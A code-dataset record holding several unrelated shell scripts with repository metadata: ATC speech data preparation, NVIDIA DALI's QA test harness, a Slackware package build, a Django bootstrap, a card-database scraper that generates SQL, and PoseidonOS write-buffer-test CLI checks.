python scripts/atc_wavscp.py $ufa_audio $atcosim_audio $partitions $data_path
python scripts/atc_segments_and_reco.py $data_path
python scripts/atc_utt2spk.py $ufa $atcosim $data_path
python scripts/broadcast_kaldi_files.py $broadcast $broadcast_trans $data_path
# Combine the 'atc' and 'broadcast' directories into a 'train' directory.
atc_path=$data_path/atc
broadcast_path=$data_path/broadcast
train_path=$data_path/train
mkdir -p $train_path
cat $atc_path/text $broadcast_path/text | sort -u > $train_path/text
cat $atc_path/segments $broadcast_path/segments | sort -u > $train_path/segments
cat $atc_path/wav.scp $broadcast_path/wav.scp | sort -u > $train_path/wav.scp
cat $atc_path/reco2file_and_channel $broadcast_path/reco2file_and_channel | sort -u > $train_path/reco2file_and_channel
cat $atc_path/utt2spk $broadcast_path/utt2spk | sort -u > $train_path/utt2spk
# Sort the files of the 'test' directory.
test_path=$data_path/test
for f in text segments wav.scp reco2file_and_channel utt2spk; do
sort $atc_path/$f -o $atc_path/$f
sort $broadcast_path/$f -o $broadcast_path/$f
sort $test_path/$f -o $test_path/$f
done
# Generate the spk2utt files.
utils/utt2spk_to_spk2utt.pl $atc_path/utt2spk > $atc_path/spk2utt
utils/utt2spk_to_spk2utt.pl $broadcast_path/utt2spk > $broadcast_path/spk2utt
utils/utt2spk_to_spk2utt.pl $train_path/utt2spk > $train_path/spk2utt
utils/utt2spk_to_spk2utt.pl $test_path/utt2spk > $test_path/spk2utt
# Ensures segments are present in all files.
bash utils/fix_data_dir.sh $atc_path
bash utils/fix_data_dir.sh $broadcast_path
bash utils/fix_data_dir.sh $train_path
bash utils/fix_data_dir.sh $test_path
echo ATC data preparation succeeded.
| true
|
2732f9f26b15d92249c17ab02dabfe3decda0337
|
Shell
|
NVIDIA/DALI
|
/qa/test_template_impl.sh
|
UTF-8
| 8,921
| 3.40625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Force error checking
set -e
# Force tests to be verbose
set -x
# make python output unbuffered to get more accurate timestamps
export PYTHONUNBUFFERED=1
topdir=$(cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null && pwd )/..
source $topdir/qa/setup_test_common.sh
# Set runner for python tests
export PYTHONPATH=${PYTHONPATH}:$topdir/qa
python_test_runner_package="nose nose2 nose-timer nose2-test-timer"
# use DALI nose wrapper to patch nose to support Python 3.10
python_test_runner="python -m nose_wrapper"
python_test_args="--verbose --with-timer --timer-top-n 20 -s"
python_invoke_test="${python_test_runner} ${python_test_args}"
# New framework for Python Tests
# During the transition we run both
# When all tests are ported old will be removed
python_new_test_runner="python -m nose2"
python_new_test_args="--verbose --plugin=nose2_test_timer.plugin --with-timer --timer-color --timer-top-n 20"
python_new_invoke_test="${python_new_test_runner} ${python_new_test_args}"
# Set proper CUDA version for packages, like MXNet, requiring it
pip_packages=$(eval "echo \"${pip_packages}\"" | sed "s/##CUDA_VERSION##/${CUDA_VERSION}/")
last_config_index=$($topdir/qa/setup_packages.py -n -u $pip_packages --cuda ${CUDA_VERSION})
install_pip_pkg() {
install_cmd="$@"
# if no package was found in our download dir, so install it from index
${install_cmd} --no-index || ${install_cmd}
}
if [ -n "$gather_pip_packages" ]
then
# early exit
return 0
fi
source $topdir/qa/setup_dali_extra.sh
target_dir=${target_dir-./}
cd ${target_dir}
# Limit to only one configuration (First version of each package)
if [[ $one_config_only = true ]]; then
echo "Limiting test run to one configuration of packages (first version of each)"
last_config_index=$(( 0 > $last_config_index ? $last_config_index : 0 ))
fi
# some global test setup
if [ "$(type -t do_once)" = 'function' ]; then
do_once
fi
prolog=${prolog-:}
epilog=${epilog-:}
# get the number of elements in `prolog` array
numer_of_prolog_elms=${#prolog[@]}
enable_sanitizer() {
# supress leaks that are false positive or not related to DALI
export LSAN_OPTIONS=suppressions=$topdir/qa/leak.sup
export ASAN_OPTIONS=symbolize=1:protect_shadow_gap=0:log_path=sanitizer.log:start_deactivated=true:allocator_may_return_null=1:detect_leaks=1:fast_unwind_on_malloc=0:verify_asan_link_order=0:detect_container_overflow=0
export ASAN_SYMBOLIZER_PATH=$(which llvm-symbolizer)
# avoid python false positives
export PYTHONMALLOC=malloc
# if something calls dlclose on a module that leaks and it happens before asan can extract symbols we get "unknown module"
# in the stack trace, to prevent this provide dlclose that does nothing
echo "int dlclose(void* a) { return 0; }" > /tmp/fake_dlclose.c && gcc -shared -o /tmp/libfakeclose.so /tmp/fake_dlclose.c
# for an unknown reason the more recent asan when we set PYTHONMALLOC=malloc, when captures the backtrace for
# the `new` call, calls malloc which is intercepted and backtrace is attempted to be captured
# however `_Unwind_Find_FDE` is not reentrant as it uses a mutex which leads to a deadlock
gcc -shared -fPIC $topdir/qa/test_wrapper_pre.c -o /tmp/pre.so
gcc -shared -fPIC $topdir/qa/test_wrapper_post.c -o /tmp/post.so
export OLD_LD_PRELOAD=${LD_PRELOAD}
export LD_PRELOAD="/tmp/pre.so /usr/lib/x86_64-linux-gnu/libasan.so /tmp/glibc_fix.so /tmp/post.so /usr/lib/x86_64-linux-gnu/libstdc++.so /tmp/libfakeclose.so"
}
# turn off sanitizer to avoid breaking any non-related system built-ins
disable_sanitizer() {
export ASAN_OPTIONS=start_deactivated=true:detect_leaks=0
export LD_PRELOAD=${OLD_LD_PRELOAD}
unset ASAN_SYMBOLIZER_PATH
unset PYTHONMALLOC
}
# Wrap the test_body in a subshell, where we can safely execute it with `set -e`
# and turn it off in current shell to intercept the error code
# when sanitizers are on, do set +e to run all the test no matter what the result is
# and collect as much of sanitizers output as possible
test_body_wrapper() {(
if [ -n "$DALI_ENABLE_SANITIZERS" ]; then
set +e
enable_sanitizer
else
set -e
fi
test_body
if [ -n "$DALI_ENABLE_SANITIZERS" ]; then
disable_sanitizer
fi
)}
process_sanitizers_logs() {
find $topdir -iname "sanitizer.log.*" -print0 | xargs -0 -I file cat file > $topdir/sanitizer.log
if [ -e $topdir/sanitizer.log ]; then
cat $topdir/sanitizer.log
grep -q ERROR $topdir/sanitizer.log && exit 1 || true
fi
find $topdir -iname "sanitizer.log*" -delete
}
# get extra index url for given packages - PEP 503 Python Package Index
extra_indices=$($topdir/qa/setup_packages.py -u $pip_packages --cuda ${CUDA_VERSION} -e)
extra_indices_string=""
for e in ${extra_indices}; do
extra_indices_string="${extra_indices_string} --extra-index-url=${e}"
done
# get link index url for given packages - a URL or path to an html file with links to archives
link_indices=$($topdir/qa/setup_packages.py -u $pip_packages --cuda ${CUDA_VERSION} -k)
link_indices_string=""
for e in ${link_indices}; do
link_indices_string="${link_indices_string} -f ${e}"
done
# store the original LD_LIBRARY_PATH
OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH
for i in `seq 0 $last_config_index`;
do
echo "Test run $i"
# seq from 0 to number of elements in `prolog` array - 1
for variant in $(seq 0 $((${numer_of_prolog_elms}-1))); do
${prolog[variant]}
echo "Test variant run: $variant"
# install the latest cuda wheel for CUDA 11.x and above tests if it is x86_64
# or we just want to use CUDA from system, not wheels
version_ge "${CUDA_VERSION}" "110" && \
if [ "$(uname -m)" == "x86_64" ] && [ -z "${DO_NOT_INSTALL_CUDA_WHEEL}" ]; then
install_pip_pkg "pip install --upgrade nvidia-npp-cu${DALI_CUDA_MAJOR_VERSION} \
nvidia-nvjpeg-cu${DALI_CUDA_MAJOR_VERSION} \
nvidia-cufft-cu${DALI_CUDA_MAJOR_VERSION} \
-f /pip-packages"
fi
# install packages
inst=$($topdir/qa/setup_packages.py -i $i -u $pip_packages --cuda ${CUDA_VERSION})
if [ -n "$inst" ]; then
for pkg in ${inst}
do
install_pip_pkg "pip install $pkg -f /pip-packages ${link_indices_string} ${extra_indices_string}"
done
# If we just installed tensorflow, we need to reinstall DALI TF plugin
if [[ "$inst" == *tensorflow* ]]; then
# The package name can be nvidia-dali-tf-plugin, nvidia-dali-tf-plugin-weekly or nvidia-dali-tf-plugin-nightly
# Different DALI can be installed as a dependency of nvidia-dali so uninstall it too
pip uninstall -y `pip list | grep nvidia-dali-tf-plugin | cut -d " " -f1` || true
pip uninstall -y `pip list | grep nvidia-dali | cut -d " " -f1` || true
pip install /opt/dali/nvidia_dali*.whl
pip install /opt/dali/nvidia-dali-tf-plugin*.tar.gz
fi
# if we are using any cuda or nvidia-tensorflow wheels (nvidia-npp, nvidia-nvjpeg or nvidia-cufft)
# unset LD_LIBRARY_PATH to not used cuda from /usr/local/ but from wheels
# however avoid removing compat from the path
if [[ "$inst" == *nvidia-n* ]] || [[ "$inst" == *nvidia-c* ]] || [[ "$inst" == *nvidia-t* ]]; then
TAIL=${LD_LIBRARY_PATH#*compat}
LD_LIBRARY_PATH=${LD_LIBRARY_PATH/$TAIL/}
export LD_LIBRARY_PATH=${LD_LIBRARY_PATH##*:}
fi
fi
# test code
# Run test_body in subshell, the exit on error is turned off in current shell,
# but it will be present in subshell (thanks to wrapper).
# We can intercept first error that happens. test_body_wrapper cannot be used with
# any conditional as it will turn on "exit on error" behaviour
set +e
test_body_wrapper
RV=$?
set -e
if [ -n "$DALI_ENABLE_SANITIZERS" ]; then
process_sanitizers_logs
fi
# restore the original LD_LIBRARY_PATH
export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH
if [ $RV -gt 0 ]; then
# if sanitizers are enabled don't capture core
if [ -z "$DALI_ENABLE_SANITIZERS" ]; then
mkdir -p $topdir/core_artifacts
cp core* $topdir/core_artifacts || true
fi
exit ${RV}
fi
# remove packages
remove=$($topdir/qa/setup_packages.py -r -u $pip_packages --cuda ${CUDA_VERSION})
if [ -n "$remove" ]; then
pip uninstall -y $remove
fi
${epilog[variant]}
done
done
| true
|
b8f9cd7965702e268b39f14a53d919ae9043ae9d
|
Shell
|
kissthink/ports
|
/libs_toolkit/gtk_engine_unico/gtk_engine_unico.build
|
UTF-8
| 1,707
| 3.125
| 3
|
[] |
no_license
|
#!/bin/bash
#
# Maintainer: Christoph J. Thompson <cjsthompson@gmail.com>
source /usr/src/ports/Build/build.sh
NAME=gtk_engine_unico
MAJOR=1.0
VERSION=${MAJOR}.2
BUILD=2
DEPENDS=('gtk+ >= 3.8.0-1')
# Description
cat > ${PKG}/install/slack-desc <<EOF
# HOW TO EDIT THIS FILE:
# The "handy ruler" below makes it easier to edit a package description. Line
# up the first '|' above the ':' following the base package name, and the '|'
# on the right side marks the last column you can put a character in. You must
# make exactly 11 lines for the formatting to be correct. It's also
# customary to leave one space after the ':'.
$(padd)|-----handy-ruler------------------------------------------------------|
${NAME}: unico
${NAME}:
${NAME}: A gtk+ theme engine that aims to be the most complete and powerful
${NAME}: theming engine. It is written with the gtk+ style context APIs in
${NAME}: mind, using CSS as a first class citizen.
${NAME}:
${NAME}: Homepage: http://launchpad.net/unico
${NAME}:
${NAME}:
${NAME}:
${NAME}:
EOF
# Sources
SRCNAME[0]=unico
SRCVERS[0]=${VERSION}
SRCPACK[0]=https://launchpad.net/${SRCNAME[0]}/${MAJOR}/${SRCVERS[0]}/+download/${SRCNAME[0]}-${SRCVERS[0]}.tar.gz
SRCCOPY[0]="LGPL21"
build0()
{
sed -i 's|$(libdir)/gtk-3.0|$(libdir)/plugins/gtk-3.0|g' unico/Makefile.{am,in}
CFLAGS="${FLAGS}" CXXFLAGS="${FLAGS}" \
./configure \
--build="${ARCH}-slackware-linux" \
--disable-dependency-tracking \
--disable-silent-rules \
--enable-static=no \
--enable-shared=yes \
--prefix="${SYS_DIR[usr]}" \
--mandir="${SYS_DIR[man]}" \
--sysconfdir="${SYS_DIR[etc]}" \
--libdir="${SYS_DIR[lib]}" \
--localstatedir="${SYS_DIR[var]}"
make ${JOBS}
make install DESTDIR="${PKG}"
doc AUTHORS
changelog NEWS
}
| true
|
e285c04c95ba413799d1bccd336bb734ba6ad797
|
Shell
|
zhao-lin-li/django_with_containers
|
/bootstrap.sh
|
UTF-8
| 563
| 4.03125
| 4
|
[] |
no_license
|
#!/bin/sh
# This script bootstraps the application
set -e
### define functions
SRC_DIR=$(cd "$(dirname "$0")"; pwd -P)
. "$SRC_DIR"/scripts/bootstrap/functions.sh
set_defaults() {
ENV=development
}
gather_options() {
while getopts "e:" OPT; do
case $OPT in
e)
ENV=$OPTARG
;;
esac
done
}
### define functions:end
set_defaults
gather_options "$@"
case $ENV in
'development')
echo "Clearing out old containers"
teardown_containers "$ENV"
echo "Setting up $ENV containers"
setup_containers "$ENV"
;;
esac
| true
|
c6ee65ebbb815d8bae9ec866da6f9113d44354cc
|
Shell
|
danives/FFTCGDB
|
/bin/update_cards.sh
|
UTF-8
| 7,706
| 3.9375
| 4
|
[] |
no_license
|
#!/bin/bash -e
# Scrape every card page from fftcgdb.com and generate cards.sql: a stream
# of SQL statements that either rebuilds the `cards` table from scratch
# ("clean") or updates existing rows in place ("sync", the default).

### Setting default values.
# URL - the target to query for scraping cards out of
url="http://fftcgdb.com/card"
# Stop - what message to search for that would signify we've asked for a non-existant card
stop="Whoops! You found an error."
# Sets - What sets (Opuses) of cards we want to retrieve.
sets=("1" "2" "3" "pr")
# Type - 'clean' is drop all table contents and make from scratch; 'sync' is just update existing cards in the table.
type="$(echo "$1" | awk '{print tolower($0)}')"
###

# Escape embedded single quotes so a value can sit inside a single-quoted
# SQL string.  Quoting "$1" (instead of the previous unquoted `echo $var`)
# preserves runs of whitespace inside card names and rules text.
sql_escape() {
    printf '%s' "$1" | sed "s/'/\\\\'/g"
}

# Lower-case a value; the element and type columns are stored lower-case.
to_lower() {
    printf '%s' "$1" | awk '{print tolower($0)}'
}

# Default to the less destructive option
if [ "$type" != "clean" ]; then
    type="sync"
fi

# Housekeeping
rm -f 'cards.sql'

# Purge all old Card table entries, thus replacing them with our new ones. Only do this if we're cleaning
if [[ "$type" == "clean" ]]; then
    echo "delete from cards;" > cards.sql
    echo "ALTER TABLE cards AUTO_INCREMENT = 1;" >> cards.sql
fi

# Header for our imminent dump of card data to stdout.
printf '%-30s%-20s%-20s%-20s%-30s%-20s%-20s%-20s%-20s\n' "NAME" "ELEMENT" "COST" "TYPE" "JOB" "CATEGORY" "POWER" "RARITY" "NUMBER"

for s in "${sets[@]}"; do
    # More housekeeping
    rm -f '.cache'
    touch .cache
    i="1"
    # Walk card numbers upward until the site serves its error page.
    while :; do
        curl "$url/$s-$i" 2>/dev/null > .cache
        # A page carrying the stop marker means card $i does not exist.
        # One fixed-string check here replaces the three separate greps
        # that the previous version ran on every iteration.
        if grep -qF -- "$stop" .cache; then
            break
        fi
        # Parse each card field out of the cached page.
        card_name="$(grep "<h4>" .cache | sed -e 's/.*<h4>//g' -e "s/'/'/g")"
        card_elem="$(grep ".png\" /> (" .cache | sed -e 's/.*(//g' -e 's/).*//g')"
        card_type="$(grep -A 1 ">Type<" .cache | grep -v ">Type<" | sed -e 's/.*<td>//g' -e 's/<\/td>.*//g')"
        card_cost="$(grep -A 1 ">Cost<" .cache | grep -v ">Cost<" | sed -e 's/.*none;">//g' -e 's/<\/td>.*//g')"
        card_job="$(grep -A 1 ">Job<" .cache | grep -v ">Job<" | sed -e 's/.*<td>//g' -e 's/<\/td>.*//g' -e "s/'/'/g")"
        card_cat="$(grep -A 1 ">Category<" .cache | grep -v ">Category<" | sed -e 's/.*<td>//g' -e 's/<\/td>.*//g')"
        card_pwr="$(grep -A 1 ">Power<" .cache | grep -v ">Power<" | sed -e 's/.*<td>//g' -e 's/<\/td>.*//g')"
        card_num="$(grep -A 1 ">Card Number<" .cache | grep -v ">Card Number<" | sed -e 's/.*<td>//g' -e 's/<\/td>.*//g')"
        card_rare="$(echo "$card_num" | sed -e 's/.*-//g')"
        card_text="$(grep -A 1 ">Card Text<" .cache | grep -v ">Card Text<" | sed -e 's/.*<td><p>//g' -e 's/<\/p><\/td>.*//g' -e "s/'/'/g")"
        # Display what cards we've found, and the information we parsed for
        # each card. Allows for review prior to implementation.
        printf '%-30s%-20s%-20s%-20s%-30s%-20s%-20s%-20s%-20s\n' "$card_name" "$card_elem" "$card_cost" "$card_type" "$card_job" "$card_cat" "$card_pwr" "$card_rare" "$card_num"
        # The database wants an integer for card cost, so ensure it gets one.
        if [[ "$card_cost" == "" ]]; then
            card_cost="0"
        fi
        # Replace tags with markup in text we pulled to keep things clean
        card_text="$(echo "$card_text" | sed -e 's|<img class="small-icon" src="/img/icons/special.png" />|[s]|g' \
            -e 's|<img class="small-icon" src="/img/icons/dull.png" />|[dull]|g' \
            -e 's|<img class="small-icon" src="/img/icons/fire.png" />|[fire]|g' \
            -e 's|<img class="small-icon" src="/img/icons/ice.png" />|[ice]|g' \
            -e 's|<img class="small-icon" src="/img/icons/air.png" />|[air]|g' \
            -e 's|<img class="small-icon" src="/img/icons/earth.png" />|[earth]|g' \
            -e 's|<img class="small-icon" src="/img/icons/lightning.png" />|[lightning]|g' \
            -e 's|<img class="small-icon" src="/img/icons/water.png" />|[water]|g' \
            -e 's|<span class="fa-stack fa-1x"><i class="fa fa-circle-thin fa-stack-1x"></i><span class="fa-stack-1x">1</span></span>|[1]|g' \
            -e 's|<span class="fa-stack fa-1x"><i class="fa fa-circle-thin fa-stack-1x"></i><span class="fa-stack-1x">2</span></span>|[2]|g' \
            -e 's|<span class="fa-stack fa-1x"><i class="fa fa-circle-thin fa-stack-1x"></i><span class="fa-stack-1x">3</span></span>|[3]|g' \
            -e 's|<b>||g' \
            -e 's|</b>||g')"
        # Escape / normalise once instead of inline in every printf below.
        esc_name=$(sql_escape "$card_name")
        esc_job=$(sql_escape "$card_job")
        esc_text=$(sql_escape "$card_text")
        low_elem=$(to_lower "$card_elem")
        low_type=$(to_lower "$card_type")
        if [[ "$type" == "clean" ]]; then
            # Conditional insert - only adds the card if one with the same
            # set number and card number is not found in the database.
            if echo "$card_type" | grep -qi "forward"; then
                printf "INSERT INTO cards ( set_number, name, cost, element, type, job, category, text, card_number, rarity, power, created_at, updated_at ) select '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', NOW(), NOW() from DUAL where not exists ( select id from cards where TRIM(LEADING '0' FROM card_number) = '%s' and set_number = '%s' limit 1 );\n" "$s" "$esc_name" "$card_cost" "$low_elem" "$low_type" "$esc_job" "$card_cat" "$esc_text" "$i" "$card_rare" "$card_pwr" "$i" "$s" >> cards.sql
            else
                # Non-forwards omit the 'power' value; otherwise SQL would
                # complain we aren't providing an integer.
                printf "INSERT INTO cards ( set_number, name, cost, element, type, job, category, text, card_number, rarity, created_at, updated_at ) select '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', NOW(), NOW() from DUAL where not exists ( select id from cards where TRIM(LEADING '0' FROM card_number) = '%s' and set_number = '%s' limit 1 );\n" "$s" "$esc_name" "$card_cost" "$low_elem" "$low_type" "$esc_job" "$card_cat" "$esc_text" "$i" "$card_rare" "$i" "$s" >> cards.sql
            fi
        else
            if echo "$card_type" | grep -qi "forward"; then
                printf "UPDATE cards SET name = '%s', cost = '%s', element = '%s', type = '%s', job = '%s', category = '%s', text = '%s', rarity = '%s', power ='%s', updated_at = NOW() where set_number = '%s' and TRIM(LEADING '0' FROM card_number) = '%s' limit 1;\n" "$esc_name" "$card_cost" "$low_elem" "$low_type" "$esc_job" "$card_cat" "$esc_text" "$card_rare" "$card_pwr" "$s" "$i" >> cards.sql
            else
                printf "UPDATE cards SET name = '%s', cost = '%s', element = '%s', type = '%s', job = '%s', category = '%s', text = '%s', rarity = '%s', updated_at = NOW() where set_number = '%s' and TRIM(LEADING '0' FROM card_number) = '%s' limit 1;\n" "$esc_name" "$card_cost" "$low_elem" "$low_type" "$esc_job" "$card_cat" "$esc_text" "$card_rare" "$s" "$i" >> cards.sql
            fi
        fi
        i="$((i+1))"
    done
done
# more housekeeping
rm -f '.cache'
exit 0
| true
|
bce56a88b533266fd6ad2004c57e27d70c38a0d8
|
Shell
|
south-potato/poseidonos
|
/test/script/wbtTestScript.sh
|
UTF-8
| 19,026
| 3.40625
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
#Run it from root ibof directory
#eg bash ./script/wbtTestScript.sh
#cd $(dirname $0)
scriptPath=$(pwd)
echo "In Directory " $scriptPath
ROOT_DIR=$(readlink -f $(dirname $0))/../..
#Relative_Path_root="../.."
BIN_DIR=${ROOT_DIR}/bin
VM_IP_RANGE_1="10.1.11."
VM_IP_RANGE_2="10.100.11."
ARRAYNAME=POSArray
#####################################################################
fileSize1=4096
fileSize2=4096
fileName1="testFile1"
fileName2="testFile2"
fileOffset1=0
fileOffset2=0
#Dont put special chars in data Cause its going though Json parser.
#TODO: Find another way to send data to API
fileData1="sdfsfsdfsdfsdfsdfsdfsdfsdfsdfsfsdfsd.....ABCDEFGHIJKLMNOPQRSTUVWXYZ09876543211234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
fileData2="sdslkhspweoncmspwenajhdfvglqelkhsdsfisdkfjasdkfsdjghwgjwdsfsalghsgsoisligpiuoiuysalgytity53493534538r937085q34850802949wfhgjwl19035820r82wjhwejrhwkhfksdfhksdfsdfsadf"
dataLength1=$(expr ${#fileData1} + ${#fileData2})
dataLength2=$(expr ${#fileData1} + ${#fileData2})
#:TODO Need to get fileDesc from MFS util, but for now using this HARDCODED
fileDesc1=3
fileDesc2=4
inputFile="${scriptPath}/../wbtWriteBufferFile"
cliOutput="${scriptPath}/../wbtCliOutput.txt"
InodeOutput="${scriptPath}/../inodeInfo.json"
FilesInfoOutput="${scriptPath}/../filesInfo.json"
InodeInput="${scriptPath}/../inodeInfo.json"
echo "Input Buffer File " $inputFile
echo "Cli Output file " $cliOutput
#####################################################################
#read -p "Want to MountArray?. Enter y or n:" runMountArray
echo "Input in file.\n"
touch $inputFile
echo -n "$fileData1" >> $inputFile
echo -n "$fileData2" >> $inputFile
cwd="/home/ibof/ibofos/"
exec_mode=0
touch $cliOutput
nss="nqn.2019-04.pos:subsystem1"
transport=tcp
target_ip=10.1.11.254
target_fabric_ip=10.100.11.254
target_port=1158
ip="10.100.11.28"
test_iteration=2000
totalsize=100 #pm : 12500
volcnt=4
test_time=3600
cpusallowed="10-11"
# array mode [normal, degraded]
arraymode="normal"
# shutdown type [none, spor, npor]
shutdowntype="none"
# rebuild mode [none, rebuild_before_gc, rebuild_after_gc]
rebuild="none"
exit_result=0
#######################################
# Print a colored pass/fail line to stderr.
# Globals:   exit_result - set to 1 on failure (read at script exit)
# Arguments: $1 - message text
#            $2 - status (0 = pass, non-zero = fail)
#######################################
print_result()
{
    local result=$1
    local expectedResult=$2
    # The original interpolated ${date}, which is never assigned anywhere
    # in this script and therefore always expanded empty; emit a real
    # timestamp instead.
    local ts
    ts=$(date)
    if [ "$expectedResult" -eq 0 ]; then
        printf '\033[1;34m%s [result] %s \033[0m\n' "$ts" "$result" >&2
    else
        printf '\033[1;41m%s [TC failed] %s \033[0m\n' "$ts" "$result" >&2
        exit_result=1
    fi
}
#######################################
# Inspect the last CLI invocation's JSON output for success.
# Globals:   cliOutput - path to the JSON file the CLI wrote
# Outputs:   pass/fail line via print_result; sets exit_result on failure.
#######################################
check_result()
{
    local code
    # Read the status code directly with jq instead of the previous
    # `cat | jq > result.txt` round trip, which spawned a useless cat and
    # clobbered result.txt (a scratch file also used by top-level code).
    code=$(jq ".Response.result.status.code" "${cliOutput}" 2>/dev/null)
    # A missing or non-numeric code used to crash the numeric test
    # `[ ${result} -ne 0 ]`; treat anything other than a literal 0 as
    # failure instead.
    if [ "$code" = "0" ]; then
        print_result "CMD is working" 0
    else
        print_result "there is a problem" 1
    fi
}
#######################################
# Inverse of check_result: a non-zero CLI status code is the expected
# outcome, so success means the command reported an error.
# Globals:   cliOutput - path to the JSON file the CLI wrote
# Outputs:   pass/fail line via print_result; sets exit_result on failure.
#######################################
check_result_expected_fail()
{
    local code
    # Same fix as check_result: direct jq read, no temp file, and a
    # string comparison that cannot crash on empty jq output.
    code=$(jq ".Response.result.status.code" "${cliOutput}" 2>/dev/null)
    if [ "$code" = "0" ]; then
        print_result "there is a problem" 1
    else
        print_result "CMD is working" 0
    fi
}
pause()
{
    # Prompt, then block until a single (silent, raw) keystroke arrives.
    printf '%s\n' "Press any key to continue.."
    read -r -s -n 1
}
while getopts "f:t:i:s:c:p:a:r:" opt
do
case "$opt" in
f) ip="$OPTARG"
;;
t) test_time="$OPTARG"
;;
i) test_iteration="$OPTARG"
;;
s) totalsize="$OPTARG"
;;
c) cpusallowed="$OPTARG"
;;
p) shutdowntype="$OPTARG"
;;
a) arraymode="$OPTARG"
;;
r) rebuild="$OPTARG"
esac
done
echo "------------[Kill & Start poseidonos]----------------------------------"
sudo ${ROOT_DIR}/test/script/kill_poseidonos.sh
sudo ${ROOT_DIR}/script/start_poseidonos.sh
sleep 10
echo ------------[setup poseidonos]-------------------------------------------
#sudo ${ROOT_DIR}/test/system/longterm/setup_ibofos.sh create ${arraymode} ${totalsize} ${volcnt} ${ip}
${ROOT_DIR}/test/system/io_path/setup_ibofos_nvmf_volume.sh -a ${ip}
echo ------------[setup Done]-------------------------------------------
echo -------------------------------------------------------------------
echo ------------[Map WBT CMDs]-------------------------------------------
volname="vol1"
volsize=21474836480
echo -[Map : get_map_layout]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt get_map_layout --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : read_vsamap]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt read_vsamap --name vol1 --output VSAMap_vol1.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : write_vsamap]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt write_vsamap --name vol1 --input VSAMap_vol1.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : read_vsamap_entry]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt read_vsamap_entry --name $volname --rba 0 --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : write_vsamap_entry]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt write_vsamap_entry --name $volname --rba 0 --vsid 1 --offset 1 --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : read_stripemap]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt read_stripemap --output StripeMap.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : write_stripemap]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt write_stripemap --input StripeMap.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : read_stripemap_entry]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt read_stripemap_entry --vsid 0 --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : write_stripemap_entry]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt write_stripemap_entry --vsid 0 --loc 1 --lsid 123 --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : read_whole_reverse_map]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt read_whole_reverse_map --output ReverseMapWhole.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : write_whole_reverse_map]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt write_whole_reverse_map --input ReverseMapWhole.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : read_reverse_map]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt read_reverse_map --vsid 0 --output ReverseMap_vsid0.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : write_reverse_map]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt write_reverse_map --vsid 0 --input ReverseMap_vsid0.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : read_reverse_map_entry]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt read_reverse_map_entry --vsid 0 --offset 0 --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : write_reverse_map_entry]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt write_reverse_map_entry --vsid 0 --offset 0 --rba 0 --name vol1 --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : get_bitmap_layout]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt get_bitmap_layout --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : get_instant_meta_info]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt get_instant_meta_info --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : get_wb_lsid_bitmap]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt get_wb_lsid_bitmap --output wbLsidBitmap.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : set_wb_lsid_bitmap]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt set_wb_lsid_bitmap --input wbLsidBitmap.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : get_active_stripe_tail]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt get_active_stripe_tail --output activeStripeTail.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : set_active_stripe_tail]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt set_active_stripe_tail --input activeStripeTail.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : get_current_ssd_lsid]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt get_current_ssd_lsid --output currentSsdLsid.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : set_current_ssd_lsid]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt set_current_ssd_lsid --input currentSsdLsid.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : get_user_segment_bitmap]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt get_user_segment_bitmap --output segmentBitmap.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
